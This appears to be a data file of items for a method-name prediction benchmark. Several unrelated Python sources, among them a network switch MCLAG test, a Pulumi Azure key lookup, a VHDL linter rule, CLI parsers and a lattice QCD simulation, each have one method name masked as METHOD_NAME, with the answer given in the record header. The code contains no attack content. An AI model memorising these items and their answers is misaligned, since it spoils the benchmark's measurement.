#check table entry doesn't exits with this key
def check_table_doesnt_exists(db, table, key):
error_info = [ ]
tbl = swsscommon.Table(db, table)
keys = tbl.getKeys()
if key in keys:
error_info.append("unexcpected: The table with desired key %s is found" % key)
return False, error_info
return True, error_info
def create_mclag_domain(dvs, domain_id, source_ip, peer_ip, peer_link):
tbl = swsscommon.Table(dvs.cdb, "MCLAG_DOMAIN")
fvs = swsscommon.FieldValuePairs([("source_ip", source_ip),
("peer_ip", peer_ip),
("peer_link", peer_link)])
tbl.set(domain_id, fvs)
time.sleep(1)
def METHOD_NAME(dvs, domain_id):
tbl = swsscommon.Table(dvs.cdb, "MCLAG_DOMAIN")
tbl._del(domain_id)
time.sleep(1)
def add_mclag_domain_field(dvs, domain_id, field, value):
tbl = swsscommon.Table(dvs.cdb, "MCLAG_DOMAIN")
fvs = swsscommon.FieldValuePairs([(field, value)])
tbl.set(domain_id, fvs)
time.sleep(1)
def create_mclag_interface(dvs, domain_id, mclag_interface):
tbl = swsscommon.Table(dvs.cdb, "MCLAG_INTERFACE")
fvs = swsscommon.FieldValuePairs([("if_type", "PortChannel")])
key_string = domain_id + "|" + mclag_interface
tbl.set(key_string, fvs)
time.sleep(1)
def remove_mclag_interface(dvs, domain_id, mclag_interface):
tbl = swsscommon.Table(dvs.cdb, "MCLAG_INTERFACE")
key_string = domain_id + "|" + mclag_interface
tbl._del(key_string)
time.sleep(1)
# Test MCLAG Configs
class TestMclagConfig(object):
CFG_MCLAG_DOMAIN_TABLE = "MCLAG_DOMAIN"
CFG_MCLAG_INTERFACE_TABLE = "MCLAG_INTERFACE"
PORTCHANNEL1 = "PortChannel11"
PORTCHANNEL2 = "PortChannel50"
PORTCHANNEL3 = "PortChannel51"
MCLAG_DOMAIN_ID = "4095"
MCLAG_SRC_IP = "10.5.1.1"
MCLAG_PEER_IP = "10.5.1.2"
MCLAG_PEER_LINK = PORTCHANNEL1
MCLAG_DOMAIN_2 = "111"
MCLAG_SESS_TMOUT_VALID_LIST = ["3","3600"]
MCLAG_KA_VALID_LIST = ["1","60"]
MCLAG_KA_INVALID_LIST = ["0","61"]
MCLAG_SESS_TMOUT_INVALID_LIST = ["0","3601"]
MCLAG_INTERFACE1 = PORTCHANNEL2
MCLAG_INTERFACE2 = PORTCHANNEL3
# Testcase 1 Verify Configuration of MCLAG Domain with src, peer ip and peer link config gets updated in CONFIG_DB
@pytest.mark.dev_sanity
def test_mclag_cfg_domain_add(self, dvs, testlog):
dvs.setup_db()
#cleanup existing entries
delete_table_keys(dvs.cdb, self.CFG_MCLAG_DOMAIN_TABLE)
delete_table_keys(dvs.cdb, self.CFG_MCLAG_INTERFACE_TABLE)
create_mclag_domain(dvs, self.MCLAG_DOMAIN_ID, self.MCLAG_SRC_IP, self.MCLAG_PEER_IP, self.MCLAG_PEER_LINK)
time.sleep(2)
#check whether domain cfg table contents are same as configured values
ok,error_info = dvs.all_table_entry_has(dvs.cdb, self.CFG_MCLAG_DOMAIN_TABLE, self.MCLAG_DOMAIN_ID,
[
("source_ip",self.MCLAG_SRC_IP),
("peer_ip",self.MCLAG_PEER_IP),
("peer_link",self.MCLAG_PEER_LINK)
]
)
assert ok,error_info
# Testcase 3 Verify Configuration of MCLAG Interface to existing domain
@pytest.mark.dev_sanity
def test_mclag_cfg_intf_add(self, dvs, testlog):
dvs.setup_db()
create_mclag_interface(dvs, self.MCLAG_DOMAIN_ID, self.MCLAG_INTERFACE1)
time.sleep(2)
#check whether mclag interface config is reflected
key_string = self.MCLAG_DOMAIN_ID + "|" + self.MCLAG_INTERFACE1
ok,error_info = check_table_exists(dvs.cdb, self.CFG_MCLAG_INTERFACE_TABLE, key_string)
assert ok,error_info
# Testcase 4 Verify remove and add mclag interface
@pytest.mark.dev_sanity
def test_mclag_cfg_intf_remove_and_add(self, dvs, testlog):
dvs.setup_db()
remove_mclag_interface(dvs, self.MCLAG_DOMAIN_ID, self.MCLAG_INTERFACE1)
time.sleep(2)
#check whether mclag interface is removed
key_string = self.MCLAG_DOMAIN_ID + "|" + self.MCLAG_INTERFACE1
ok,error_info = check_table_doesnt_exists(dvs.cdb, self.CFG_MCLAG_INTERFACE_TABLE, key_string)
assert ok,error_info
#add different mclag interface
create_mclag_interface(dvs, self.MCLAG_DOMAIN_ID, self.MCLAG_INTERFACE2)
time.sleep(2)
#check whether new mclag interface is added
key_string = self.MCLAG_DOMAIN_ID + "|" + self.MCLAG_INTERFACE2
ok,error_info = check_table_exists(dvs.cdb, self.CFG_MCLAG_INTERFACE_TABLE, key_string)
assert ok,error_info
# Testcase 5 Verify Configuration of valid values for session timeout
@pytest.mark.dev_sanity
def test_mclag_cfg_session_timeout_valid_values(self, dvs, testlog):
dvs.setup_db()
for value in self.MCLAG_SESS_TMOUT_VALID_LIST:
add_mclag_domain_field(dvs, self.MCLAG_DOMAIN_ID, "session_timeout", value)
time.sleep(2)
#check whether domain cfg table contents are same as configured values
ok,error_info = dvs.all_table_entry_has(dvs.cdb, self.CFG_MCLAG_DOMAIN_TABLE, self.MCLAG_DOMAIN_ID,
[
("source_ip",self.MCLAG_SRC_IP),
("peer_ip",self.MCLAG_PEER_IP),
("peer_link",self.MCLAG_PEER_LINK),
("session_timeout",value)
]
)
assert ok,error_info
# Testcase 6 Verify Configuration of valid values for KA timer
@pytest.mark.dev_sanity
def test_mclag_cfg_ka_valid_values(self, dvs, testlog):
dvs.setup_db()
for value in self.MCLAG_KA_VALID_LIST:
add_mclag_domain_field(dvs, self.MCLAG_DOMAIN_ID, "keepalive_interval", value)
time.sleep(2)
#check whether domain cfg table contents are same as configured values
ok,error_info = dvs.all_table_entry_has(dvs.cdb, self.CFG_MCLAG_DOMAIN_TABLE, self.MCLAG_DOMAIN_ID,
[
("source_ip",self.MCLAG_SRC_IP),
("peer_ip",self.MCLAG_PEER_IP),
("peer_link",self.MCLAG_PEER_LINK),
("keepalive_interval",value)
]
)
assert ok,error_info
# Testcase 7 Verify Deletion of MCLAG Domain
@pytest.mark.dev_sanity
def test_mclag_cfg_domain_del(self, dvs, testlog):
dvs.setup_db()
METHOD_NAME(dvs, self.MCLAG_DOMAIN_ID)
time.sleep(2)
#check whether domain cfg table contents are same as configured values
ok, error_info = check_table_doesnt_exists(dvs.cdb, self.CFG_MCLAG_DOMAIN_TABLE, self.MCLAG_DOMAIN_ID)
assert ok,error_info
#make sure mclag interface tables entries are also deleted when mclag domain is deleted
key_string = self.MCLAG_DOMAIN_ID
ok,error_info = check_table_doesnt_exists(dvs.cdb, self.CFG_MCLAG_INTERFACE_TABLE, key_string)
assert ok,error_info |
298,470 | secondary key | # coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'ListSignalRKeysResult',
'AwaitableListSignalRKeysResult',
'list_signal_r_keys',
'list_signal_r_keys_output',
]
@pulumi.output_type
class ListSignalRKeysResult:
"""
A class represents the access keys of the resource.
"""
def __init__(__self__, primary_connection_string=None, primary_key=None, secondary_connection_string=None, METHOD_NAME=None):
if primary_connection_string and not isinstance(primary_connection_string, str):
raise TypeError("Expected argument 'primary_connection_string' to be a str")
pulumi.set(__self__, "primary_connection_string", primary_connection_string)
if primary_key and not isinstance(primary_key, str):
raise TypeError("Expected argument 'primary_key' to be a str")
pulumi.set(__self__, "primary_key", primary_key)
if secondary_connection_string and not isinstance(secondary_connection_string, str):
raise TypeError("Expected argument 'secondary_connection_string' to be a str")
pulumi.set(__self__, "secondary_connection_string", secondary_connection_string)
if METHOD_NAME and not isinstance(METHOD_NAME, str):
raise TypeError("Expected argument 'secondary_key' to be a str")
pulumi.set(__self__, "secondary_key", METHOD_NAME)
@property
@pulumi.getter(name="primaryConnectionString")
def primary_connection_string(self) -> Optional[str]:
"""
Connection string constructed via the primaryKey
"""
return pulumi.get(self, "primary_connection_string")
@property
@pulumi.getter(name="primaryKey")
def primary_key(self) -> Optional[str]:
"""
The primary access key.
"""
return pulumi.get(self, "primary_key")
@property
@pulumi.getter(name="secondaryConnectionString")
def secondary_connection_string(self) -> Optional[str]:
"""
Connection string constructed via the secondaryKey
"""
return pulumi.get(self, "secondary_connection_string")
@property
@pulumi.getter(name="secondaryKey")
def METHOD_NAME(self) -> Optional[str]:
"""
The secondary access key.
"""
return pulumi.get(self, "secondary_key")
class AwaitableListSignalRKeysResult(ListSignalRKeysResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return ListSignalRKeysResult(
primary_connection_string=self.primary_connection_string,
primary_key=self.primary_key,
secondary_connection_string=self.secondary_connection_string,
METHOD_NAME=self.METHOD_NAME)
def list_signal_r_keys(resource_group_name: Optional[str] = None,
resource_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableListSignalRKeysResult:
"""
Get the access keys of the resource.
Azure REST API version: 2023-02-01.
:param str resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
:param str resource_name: The name of the resource.
"""
__args__ = dict()
__args__['resourceGroupName'] = resource_group_name
__args__['resourceName'] = resource_name
opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
__ret__ = pulumi.runtime.invoke('azure-native:signalrservice:listSignalRKeys', __args__, opts=opts, typ=ListSignalRKeysResult).value
return AwaitableListSignalRKeysResult(
primary_connection_string=pulumi.get(__ret__, 'primary_connection_string'),
primary_key=pulumi.get(__ret__, 'primary_key'),
secondary_connection_string=pulumi.get(__ret__, 'secondary_connection_string'),
METHOD_NAME=pulumi.get(__ret__, 'secondary_key'))
@_utilities.lift_output_func(list_signal_r_keys)
def list_signal_r_keys_output(resource_group_name: Optional[pulumi.Input[str]] = None,
resource_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[ListSignalRKeysResult]:
"""
Get the access keys of the resource.
Azure REST API version: 2023-02-01.
:param str resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
:param str resource_name: The name of the resource.
"""
... |
298,471 | fix right violations |
from vsg import parser
from vsg import violation
from vsg.vhdlFile import utils
from vsg.rule_group import whitespace
from vsg.rules import utils as rules_utils
class spaces_before_and_after_tokens_when_bounded_by_tokens(whitespace.Rule):
'''
Checks for a single space between two tokens.
Parameters
----------
name : string
The group the rule belongs to.
identifier : string
unique identifier. Usually in the form of 00N.
lTokens : list of token type pairs
The tokens to check for a single space between
'''
def __init__(self, name, identifier, lTokens, lBetween):
whitespace.Rule.__init__(self, name=name, identifier=identifier)
self.lTokens = lTokens
self.spaces_before = 1
self.configuration.append('spaces_before')
self.spaces_after = 4
self.configuration.append('spaces_after')
self.lBetween = lBetween
self.nTokens = 2
def _get_tokens_of_interest(self, oFile):
return oFile.get_n_tokens_before_and_after_tokens_bounded_by_tokens(self.nTokens, self.lTokens, self.lBetween)
def _analyze(self, lToi):
for oToi in lToi:
fStartLine = rules_utils.token_list_is_the_beginning_of_a_line(oToi.get_tokens())
myToi = oToi.extract_tokens(1, 3)
iLine, lTokens = utils.get_toi_parameters(myToi)
dAction = {}
if not fStartLine:
check_spaces_on_left_side(lTokens, dAction, self.spaces_before)
check_spaces_on_right_side(lTokens, dAction, self.spaces_after)
if violations_found(dAction):
sSolution = create_solution_text(dAction, self.spaces_before, self.spaces_after, lTokens)
oViolation = violation.New(iLine, myToi, sSolution)
oViolation.set_action(dAction)
self.add_violation(oViolation)
def _fix_violation(self, oViolation):
lTokens = oViolation.get_tokens()
dAction = oViolation.get_action()
fix_left_violations(self, dAction, lTokens)
METHOD_NAME(self, dAction, lTokens)
oViolation.set_tokens(lTokens)
def fix_left_violations(self, dAction, lTokens):
if not left_action_exists(dAction):
return
if dAction['left']['action'] == 'adjust':
lTokens[0].set_value(' '*self.spaces_before)
elif dAction['left']['action'] == 'remove':
lTokens.pop(0)
else:
rules_utils.insert_whitespace(lTokens, self.spaces_before)
def METHOD_NAME(self, dAction, lTokens):
if not right_action_exists(dAction):
return
if dAction['right']['action'] == 'adjust':
lTokens[-1].set_value(' '*self.spaces_after)
else:
rules_utils.insert_whitespace(lTokens, len(lTokens) - self.spaces_after)
def right_action_exists(dAction):
if 'right' in list(dAction.keys()):
return True
return False
def left_action_exists(dAction):
if 'left' in list(dAction.keys()):
return True
return False
def create_solution_text(dAction, iNumSpacesBefore, iNumSpacesAfter, lTokens):
sReturn = ''
sReturn += create_left_solution(dAction, iNumSpacesBefore, lTokens)
sReturn += create_right_solution(dAction, iNumSpacesAfter, lTokens)
return sReturn
def create_left_solution(dAction, iNumSpaces, lTokens):
sReturn = ''
if left_action_exists(dAction):
sReturn = create_solution(dAction, 'left', iNumSpaces, lTokens)
return sReturn
def create_right_solution(dAction, iNumSpaces, lTokens):
sReturn = ''
if right_action_exists(dAction):
sReturn = create_solution(dAction, 'right', iNumSpaces, lTokens)
return sReturn
def create_solution(dAction, sKey, iNumSpaces, lTokens):
sSide = dAction[sKey]['side']
sTokenValue = lTokens[1].get_value()
if dAction[sKey]['action'] == 'adjust':
sReturn = f'Change number of spaces {sSide} *{sTokenValue}* to {iNumSpaces}. '
elif dAction[sKey]['action'] == 'remove':
sReturn = f'Remove all space(s) {sSide} *{sTokenValue}*. '
else:
sReturn = f'Add {iNumSpaces} space(s) {sSide} *{sTokenValue}*. '
return sReturn.strip()
def check_spaces_on_left_side(lTokens, dAction, iSpaces):
check_for_adjustment_of_existing_whitespace(lTokens, dAction, iSpaces)
check_for_removal_of_existing_whitespace(lTokens, dAction, iSpaces)
check_for_insertion_of_missing_whitespace(lTokens, dAction, iSpaces)
def check_for_adjustment_of_existing_whitespace(lTokens, dAction, iSpaces):
oLeft = lTokens[0]
if isinstance(oLeft, parser.whitespace) and iSpaces > 0:
set_adjust_action('left', oLeft, dAction, iSpaces)
def check_for_removal_of_existing_whitespace(lTokens, dAction, iSpaces):
oLeft = lTokens[0]
if isinstance(oLeft, parser.whitespace) and iSpaces == 0:
set_remove_action('left', dAction)
def check_for_insertion_of_missing_whitespace(lTokens, dAction, iSpaces):
oLeft = lTokens[0]
if not isinstance(oLeft, parser.whitespace) and iSpaces > 0:
set_insert_action('left', dAction)
def check_spaces_on_right_side(lTokens, dAction, iSpaces):
oRight = lTokens[-1]
if isinstance(oRight, parser.whitespace):
set_adjust_action('right', oRight, dAction, iSpaces)
else:
set_insert_action('right', dAction)
def set_adjust_action(sSide, oToken, dAction, iSpaces):
if iSpaces != len(oToken.get_value()):
dAction[sSide] = {}
dAction[sSide]['action'] = 'adjust'
set_side_of_action(sSide, dAction)
def set_remove_action(sSide, dAction):
dAction[sSide] = {}
dAction[sSide]['action'] = 'remove'
set_side_of_action(sSide, dAction)
def set_insert_action(sSide, dAction):
dAction[sSide] = {}
dAction[sSide]['action'] = 'insert'
set_side_of_action(sSide, dAction)
def set_side_of_action(sSide, dAction):
if sSide == 'right':
dAction[sSide]['side'] = 'after'
else:
dAction[sSide]['side'] = 'before'
def violations_found(dAction):
if len(list(dAction.keys())) > 0:
return True
return False |
298,472 | error | """
Contains all of the logic required to create commands. It should always suffice to import
just this module for a user to create their own commands.
Inherit from :class:`BaseCommand` for regular CLI style commands, or from
:class:`BsbCommand` if you want more freedom in what exactly constitutes a command to the
BSB.
"""
import argparse
from ...exceptions import CommandError
from ...reporting import report
class BaseParser(argparse.ArgumentParser):
"""
Inherits from argparse.ArgumentParser and overloads the ``error``
method so that when an error occurs, instead of exiting and exception
is thrown.
"""
def METHOD_NAME(self, message):
"""
Raise message, instead of exiting.
:param message: Error message
:type message: str
"""
raise CommandError(message)
_is_root = True
class BsbCommand:
def add_to_parser(self):
raise NotImplementedError("Commands must implement a `add_to_parser` method.")
def handler(self, context):
raise NotImplementedError("Commands must implement a `handler` method.")
def __init_subclass__(cls, parent=None, abstract=False, name=None, **kwargs):
global _is_root
if abstract:
return
if cls.add_to_parser is BsbCommand.add_to_parser:
raise NotImplementedError("Commands must implement a `add_to_parser` method.")
if cls.handler is BsbCommand.handler:
raise NotImplementedError("Commands must implement a `handler` method.")
if name is None:
raise CommandError(f"{cls} must register a name.")
cls.name = name
cls._subcommands = []
# The very first registered command will be the RootCommand for `bsb`
if _is_root:
_is_root = False
else:
if parent is None:
parent = RootCommand
parent._subcommands.append(cls)
class BaseCommand(BsbCommand, abstract=True):
def add_to_parser(self, parent, context, locals, level):
locals = locals.copy()
locals.update(self.get_options())
parser = parent.add_parser(self.name)
self.add_parser_arguments(parser)
self.add_parser_options(parser, context, locals, level)
parser.set_defaults(handler=self.execute_handler)
self.add_subparsers(parser, context, self._subcommands, locals, level)
return parser
def add_subparsers(self, parser, context, commands, locals, level):
if len(commands) > 0:
subparsers = parser.add_subparsers()
for command in commands:
c = command()
c._parent = self
c.add_to_parser(subparsers, context, locals, level + 1)
def execute_handler(self, namespace, dryrun=False):
reduced = {}
context = namespace._context
for k, v in namespace.__dict__.items():
if v is None or k in ["_context", "handler"]:
continue
stripped = k.lstrip("_")
level = len(k) - len(stripped)
if stripped not in reduced or level > reduced[stripped][0]:
reduced[stripped] = (level, v)
namespace.__dict__ = {k: v[1] for k, v in reduced.items()}
self.add_locals(context)
context.set_cli_namespace(namespace)
report(f"Context: {context}", level=4)
if not dryrun:
self.handler(context)
def add_locals(self, context):
# Merge our options into the context, preserving those in the context as we're
# going up the tree towards lower priority and less specific options.
options = self.get_options()
options.update(context.options)
context.options = options
if hasattr(self, "_parent"):
self._parent.add_locals(context)
def add_parser_options(self, parser, context, locals, level):
merged = {}
merged.update(context.options)
merged.update(locals)
for option in merged.values():
option.add_to_parser(parser, level)
def get_options(self):
raise NotImplementedError(
"BaseCommands must implement a `get_options(self)` method."
)
def add_parser_arguments(self, parser):
raise NotImplementedError(
"BaseCommands must implement an `add_parser_arguments(self, parser)` method."
)
class RootCommand(BaseCommand, name="bsb"):
def handler(self, context):
pass
def get_parser(self, context):
parser = BaseParser()
parser.set_defaults(_context=context)
parser.set_defaults(handler=self.execute_handler)
locals = self.get_options()
self.add_parser_options(parser, context, locals, 0)
self.add_subparsers(parser, context, self._subcommands, locals, 0)
return parser
def get_options(self):
return {}
def load_root_command():
from ...plugins import discover
# Simply discovering the plugin modules should append them to their parent command
# class using the `__init_subclass__` function.
discover("commands")
return RootCommand() |
298,473 | quark | #!/usr/bin/env python3
import gpt as g
import numpy as np
import os, sys
rng = g.random("test")
# cold start
U = g.qcd.gauge.unit(g.grid([24, 24, 24, 48], g.double))
latest_it = None
it0 = 0
dst = g.default.get("--root", None)
N = 4000
for it in range(N):
if os.path.exists(f"{dst}/ckpoint_lat.{it}"):
latest_it = it
if latest_it is not None:
g.copy(U, g.load(f"{dst}/ckpoint_lat.{latest_it}"))
rng = g.random(f"test{dst}{latest_it}", "vectorized_ranlux24_24_64")
it0 = latest_it + 1
pc = g.qcd.fermion.preconditioner
inv = g.algorithms.inverter
eofa_ratio = g.qcd.pseudofermion.action.exact_one_flavor_ratio
def two_flavor_ratio(fermion, m1, m2, solver):
M1 = fermion(m1, m1)
M2 = fermion(m2, m2)
return g.qcd.pseudofermion.action.two_flavor_ratio_evenodd_schur([M1, M2], solver)
def METHOD_NAME(U0, m_plus, m_minus):
return g.qcd.fermion.mobius(
U0,
mass_plus=m_plus,
mass_minus=m_minus,
M5=1.8,
b=1.5,
c=0.5,
Ls=8,
boundary_phases=[1, 1, 1, -1],
)
pc = g.qcd.fermion.preconditioner
inv = g.algorithms.inverter
sympl = g.algorithms.integrator.symplectic
F_grid_eo = METHOD_NAME(U, 1, 1).F_grid_eo
cg_e = inv.cg({"eps": 1e-10, "maxiter": 20000})
cg_s = inv.cg(
{"eps": 1e-7, "maxiter": 20000}
) # 1e-5 -> dH=O(5), 1e-6 -> dH=O(0.18), 1e-7 -> dH=O(0.048)
slv_e = inv.preconditioned(pc.eo2_ne(), cg_e)
slv_s = inv.mixed_precision(inv.preconditioned(pc.eo2_ne(), cg_s), g.single, g.double)
# conjugate momenta
U_mom = g.group.cartesian(U)
rng.normal_element(U_mom)
action_gauge_mom = g.qcd.scalar.action.mass_term()
action_gauge = g.qcd.gauge.action.iwasaki(2.12)
rat = g.algorithms.rational.zolotarev_inverse_square_root(1.0**0.5, 11**0.5, 7)
rat_fnc = g.algorithms.rational.rational_function(rat.zeros, rat.poles, rat.norm)
# see params.py for parameter motivation
hasenbusch_ratios = [ # Nf=2+1
(0.45, 1.0, None, two_flavor_ratio, cg_e, cg_s),
(0.18, 0.45, None, two_flavor_ratio, cg_e, cg_s),
(0.07, 0.18, None, two_flavor_ratio, cg_e, cg_s),
(0.017, 0.07, None, two_flavor_ratio, cg_e, cg_s),
(0.002356, 0.017, None, two_flavor_ratio, cg_e, cg_s),
(0.03366, 1.0, rat_fnc, eofa_ratio, slv_e, slv_s),
# (0.001477, 0.1, None, two_flavor_ratio, cg_e, cg_s),
# (1.0, 1.0, rat_fnc, eofa_ratio, slv_e, slv_s),
]
fields = [
(U + [g.vspincolor(F_grid_eo)]),
(U + [g.vspincolor(F_grid_eo)]),
(U + [g.vspincolor(F_grid_eo)]),
(U + [g.vspincolor(F_grid_eo)]),
(U + [g.vspincolor(F_grid_eo)]),
(U + [g.vspincolor(U[0].grid)]),
# (U + [g.vspincolor(F_grid_eo)]),
# (U + [g.vspincolor(U[0].grid)])
]
# test test
# rat = g.algorithms.rational.zolotarev_inverse_square_root(1.0**0.5, 4**0.5, 2)
# rat_fnc = g.algorithms.rational.rational_function(rat.zeros, rat.poles, rat.norm)
# hasenbusch_ratios = [ # Nf=2+1
# (0.6, 1.0, rat_fnc),
# (0.6, 1.0, rat_fnc),
# (0.6, 1.0, rat_fnc),
# (0.3, 0.6, rat_fnc),
# (0.3, 0.6, rat_fnc)
# ]
# test test end
# exact actions
action_fermions_e = [
af(lambda m_plus, m_minus: METHOD_NAME(U, m_plus, m_minus), m1, m2, se)
for m1, m2, rf, af, se, ss in hasenbusch_ratios
]
# sloppy actions
action_fermions_s = [
af(lambda m_plus, m_minus: METHOD_NAME(U, m_plus, m_minus), m1, m2, ss)
for m1, m2, rf, af, se, ss in hasenbusch_ratios
]
metro = g.algorithms.markov.metropolis(rng)
pure_gauge = True
split_rng = [
g.random(f"{[rng.cnormal() for i in range(4)]}") for j in range(len(hasenbusch_ratios))
]
# sd = g.split_map(
# U[0].grid,
# [
# lambda dst, ii=i:
# action_fermions_e[ii].draw(dst, split_rng[ii], hasenbusch_ratios[ii][2])
# if hasenbusch_ratios[ii][3] is eofa_ratio else
# action_fermions_e[ii].draw(dst, split_rng[ii])
# for i in range(len(hasenbusch_ratios))
# ],
# [1,2,2,2]
# )
def hamiltonian(draw):
if draw:
rng.normal_element(U_mom)
s = action_gauge(U)
if not pure_gauge:
# sp = sd(fields)
for i in range(len(hasenbusch_ratios)):
if hasenbusch_ratios[i][3] is eofa_ratio:
si = action_fermions_e[i].draw(fields[i], rng, hasenbusch_ratios[i][2])
# si = sp[i]
si_check = action_fermions_e[i](fields[i])
g.message("action", i, si_check)
r = f"{hasenbusch_ratios[i][0]}/{hasenbusch_ratios[i][1]}"
e = abs(si / si_check - 1)
g.message(f"Error of rational approximation for Hasenbusch ratio {r}: {e}")
else:
si = action_fermions_e[i].draw(fields[i], rng)
s += si
h = s + action_gauge_mom(U_mom)
else:
s = action_gauge(U)
if not pure_gauge:
for i in range(len(hasenbusch_ratios)):
s += action_fermions_e[i](fields[i])
h = s + action_gauge_mom(U_mom)
return h, s
log = sympl.log()
# sf = g.split_map(
# U[0].grid,
# [
# lambda dst, src, ii=i: g.eval(dst, action_fermions_s[ii].gradient(src, src[0:len(U)]))
# for i in range(len(hasenbusch_ratios))
# ],
# [1,2,2,2]
# )
def fermion_force():
x = [g.group.cartesian(u) for u in U]
for y in x:
y[:] = 0
if not pure_gauge:
forces = [[g.lattice(y) for y in x] for i in fields]
log.time("fermion forces")
for i in range(len(hasenbusch_ratios)):
forces[i] = action_fermions_s[i].gradient(fields[i], fields[i][0 : len(U)])
log.time()
for i in range(len(hasenbusch_ratios)):
log.gradient(forces[i], f"{hasenbusch_ratios[i][0]}/{hasenbusch_ratios[i][1]} {i}")
for j in range(len(x)):
x[j] += forces[i][j]
return x
iq = sympl.update_q(U, log(lambda: action_gauge_mom.gradient(U_mom, U_mom), "gauge_mom"))
ip_gauge = sympl.update_p(U_mom, log(lambda: action_gauge.gradient(U, U), "gauge"))
ip_fermion = sympl.update_p(U_mom, fermion_force)
# mdint = sympl.OMF4(1, ip_fermion, sympl.OMF2(4, ip_gauge, iq))
mdint = sympl.OMF2(15, ip_fermion, sympl.OMF2(4, ip_gauge, iq))
def hmc(tau):
accrej = metro(U)
h0, s0 = hamiltonian(True)
mdint(tau)
h1, s1 = hamiltonian(False)
return [accrej(h1, h0), s1 - s0, h1 - h0]
accept, total = 0, 0
for it in range(it0, N):
pure_gauge = it < 10
g.message(pure_gauge)
a, dS, dH = hmc(1.0)
accept += a
total += 1
plaq = g.qcd.gauge.plaquette(U)
g.message(f"HMC {it} has P = {plaq}, dS = {dS}, dH = {dH}, acceptance = {accept/total}")
for x in log.grad:
g.message(f"{x} force norm2/sites =", np.mean(log.get(x)), "+-", np.std(log.get(x)))
g.message(f"Timing:\n{log.time}")
if it % 10 == 0:
# reset statistics
log.reset()
g.message("Reset log")
g.save(f"{dst}/ckpoint_lat.{it}", U, g.format.nersc())
# g.save(f"{dst}/ckpoint_lat.{it}", U) |
298,474 | is import command excel | import os
from typing import List, Optional
from strictdoc.cli.command_parser_builder import CommandParserBuilder
from strictdoc.helpers.auto_described import auto_described
class ImportReqIFCommandConfig:
def __init__(self, input_path: str, output_path: str, profile):
self.input_path: str = input_path
self.output_path: str = output_path
self.profile: Optional[str] = profile
class ManageAutoUIDCommandConfig:
def __init__(self, *, input_path: str):
self.input_path: str = input_path
class ImportExcelCommandConfig:
def __init__(self, input_path, output_path, parser):
self.input_path = input_path
self.output_path = output_path
self.parser = parser
class PassthroughCommandConfig:
def __init__(self, input_file, output_file):
self.input_file = input_file
self.output_file = output_file
@auto_described
class ServerCommandConfig:
def __init__(
self,
*,
input_path: str,
output_path: Optional[str],
reload: bool,
port: Optional[int],
):
assert os.path.exists(input_path)
abs_input_path = os.path.abspath(input_path)
self.input_path: str = abs_input_path
self.output_path: Optional[str] = output_path
self.reload: bool = reload
self.port: Optional[int] = port
@auto_described
class ExportCommandConfig: # pylint: disable=too-many-instance-attributes
def __init__( # pylint: disable=too-many-arguments
self,
input_paths,
output_dir: str,
project_title: Optional[str],
formats,
fields,
no_parallelization,
enable_mathjax,
reqif_profile: Optional[str],
experimental_enable_file_traceability,
):
assert isinstance(input_paths, list), f"{input_paths}"
self.input_paths: List[str] = input_paths
self.output_dir: str = output_dir
self.project_title: Optional[str] = project_title
self.formats = formats
self.fields = fields
self.no_parallelization = no_parallelization
self.enable_mathjax = enable_mathjax
self.reqif_profile: Optional[str] = reqif_profile
self.experimental_enable_file_traceability = (
experimental_enable_file_traceability
)
self.output_html_root: str = os.path.join(output_dir, "html")
class DumpGrammarCommandConfig:
def __init__(self, output_file):
self.output_file = output_file
class SDocArgsParser:
def __init__(self, args):
self.args = args
@property
def is_about_command(self):
return self.args.command == "about"
@property
def is_passthrough_command(self):
return self.args.command == "passthrough"
@property
def is_export_command(self):
return self.args.command == "export"
@property
def is_import_command_reqif(self):
return (
self.args.command == "import" and self.args.import_format == "reqif"
)
@property
def METHOD_NAME(self):
return (
self.args.command == "import" and self.args.import_format == "excel"
)
@property
def is_server_command(self):
return self.args.command == "server"
@property
def is_dump_grammar_command(self):
return self.args.command == "dump-grammar"
@property
def is_version_command(self):
return self.args.command == "version"
@property
def is_manage_autouid_command(self):
return (
self.args.command == "manage" and self.args.subcommand == "auto-uid"
)
def get_passthrough_config(self) -> PassthroughCommandConfig:
return PassthroughCommandConfig(
self.args.input_file, self.args.output_file
)
def get_export_config(self) -> ExportCommandConfig:
project_title: Optional[str] = self.args.project_title
output_dir = self.args.output_dir if self.args.output_dir else "output"
if not os.path.isabs(output_dir):
cwd = os.getcwd()
output_dir = os.path.join(cwd, output_dir)
return ExportCommandConfig(
self.args.input_paths,
output_dir,
project_title,
self.args.formats,
self.args.fields,
self.args.no_parallelization,
self.args.enable_mathjax,
self.args.reqif_profile,
self.args.experimental_enable_file_traceability,
)
def get_import_config_reqif(self, _) -> ImportReqIFCommandConfig:
return ImportReqIFCommandConfig(
self.args.input_path, self.args.output_path, self.args.profile
)
def get_manage_autouid_config(self) -> ManageAutoUIDCommandConfig:
return ManageAutoUIDCommandConfig(input_path=self.args.input_path)
def get_import_config_excel(self, _) -> ImportExcelCommandConfig:
return ImportExcelCommandConfig(
self.args.input_path, self.args.output_path, self.args.parser
)
def get_server_config(self) -> ServerCommandConfig:
return ServerCommandConfig(
input_path=self.args.input_path,
output_path=self.args.output_path,
reload=self.args.reload,
port=self.args.port,
)
def get_dump_grammar_config(self) -> DumpGrammarCommandConfig:
return DumpGrammarCommandConfig(output_file=self.args.output_file)
def create_sdoc_args_parser(testing_args=None) -> SDocArgsParser:
args = testing_args
if not args:
builder = CommandParserBuilder()
parser = builder.build()
args = parser.parse_args()
return SDocArgsParser(args) |
298,475 | validate | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
import frappe
from frappe import _
from frappe.model.mapper import get_mapped_doc
from frappe.utils import flt, getdate, nowdate
from erpnext.buying.utils import validate_for_items
from erpnext.controllers.buying_controller import BuyingController
form_grid_templates = {"items": "templates/form_grid/item_grid.html"}
class SupplierQuotation(BuyingController):
def METHOD_NAME(self):
